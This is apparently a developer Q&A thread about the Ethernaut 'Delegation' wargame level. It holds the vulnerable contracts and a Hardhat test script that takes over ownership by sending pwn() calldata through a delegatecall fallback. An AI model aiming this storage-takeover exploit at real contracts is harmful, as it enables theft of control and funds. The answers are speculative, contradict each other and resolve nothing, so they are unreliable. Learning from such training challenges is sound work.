# Solidity 0.8: delegatecall does not mutate contract's storage

Tags: solidity, hardhat, typescript

I have this problem solving [Ethernaut challenge Delegation](https://ethernaut.openzeppelin.com/level/0x9451961b7Aea1Df57bc20CC68D72f662241b5493):

The following is the original contract:

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "hardhat/console.sol";

contract Delegate {
    address public owner;

    constructor(address _owner) {
        owner = _owner;
    }

    function pwn() public {
        owner = msg.sender;
    }
}

contract Delegation {
    address public owner;
    Delegate internal delegate;

    constructor(address _delegateAddress) {
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    }

    fallback() external {
        (bool result, ) = address(delegate).delegatecall(msg.data);
        // require(result == true);
        if (result) {
            this;
        }
    }
}
```

According to [this walkthrough](https://medium.com/coinmonks/ethernaut-lvl-6-walkthrough-how-to-abuse-the-delicate-delegatecall-466b26c429e4) you can mutate original contract's storage by calling delegatecall.

I wrote my attack in hardhat. Here is the code:

```
import { SignerWithAddress } from "@nomiclabs/hardhat-ethers/signers";
import { expect } from "chai";
import { ethers } from "hardhat";
import { Delegate, Delegation } from "../../typechain";

describe("DelegationAttack", function () {
  let DelegationToken;
  let DelegateToken;
  let delegation: Delegation;
  let delegate: Delegate;
  let owner: SignerWithAddress;
  let attacker: SignerWithAddress;

  beforeEach(async function () {
    DelegateToken = await ethers.getContractFactory("Delegate");
    DelegationToken = await ethers.getContractFactory("Delegation");
    [owner, attacker] = await ethers.getSigners();
    delegate = await DelegateToken.connect(owner).deploy(owner.address);
    delegation = await DelegationToken.connect(owner).deploy(delegate.address);
  });

  describe("attack", function () {
    it("should transfer ownership", async function () {
      const ABI = ["function pwn() public"];
      const iface = new ethers.utils.Interface(ABI);
      await attacker.sendTransaction({
        from: attacker.address,
        to: delegation.address,
        data: iface.encodeFunctionData("pwn"),
      });

      const delegatedOwner = await delegation.owner();
      expect(delegatedOwner).to.equals(attacker.address);
    });
  });
});
```

When I run the test, I get this error:

> AssertionError: expected '0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266' to equal '0x70997970C51812dc3A010C7d01b50e0d17dc79C8'

Which means, `owner` variable has not been changed.

But strangely, if I uncomment this line:

```
// require(result == true);
```

then I get the test passed.

What is the reason?

Comment: Sorry I deleted my answer as having done more reading I think I was wrong, I believe result should be true as long as the delegate call is successful.

Comment: I have a similar problem with `delegatecall()` while testing in localhost. Some expected changes don't occur.

Answer (score 1):

It will work if you use Ganache to simulate a node.

First run Ganache (quickstart), then execute -

```
npx hardhat test --network ganache
```

It will also work well on Remix IDE.

Tried running it with `npx hardhat node` as a simulator then test with `npx hardhat test --network localhost` and it's the same issue, although you can see in logs that correct calls are made.

So far it seems like a Hardhat Network issue.

Answer (score -1):

I think what you need is:

```
let tx = await attacker.sendTransaction({
        from: attacker.address,
        to: delegation.address,
        data: iface.encodeFunctionData("pwn"),
      });
let receipt = await tx.wait();
```

Comment: Nice try. Thought it should solve the problem. But unfortunately still get the same error.

Comment: Weird, it works for me

Comment: My solidity version is 0.8.4 and hardhat version is 2.7.0. What's yours?

Comment: I was mistaken, it doesn't work for me.. It's weird, because that require is not even being hit, but its presence in the code changes things..

Comment: Also very strange, this causes the test to pass!
`(bool result, ) = address(delegate).delegatecall(msg.data);`
`console.log(result);`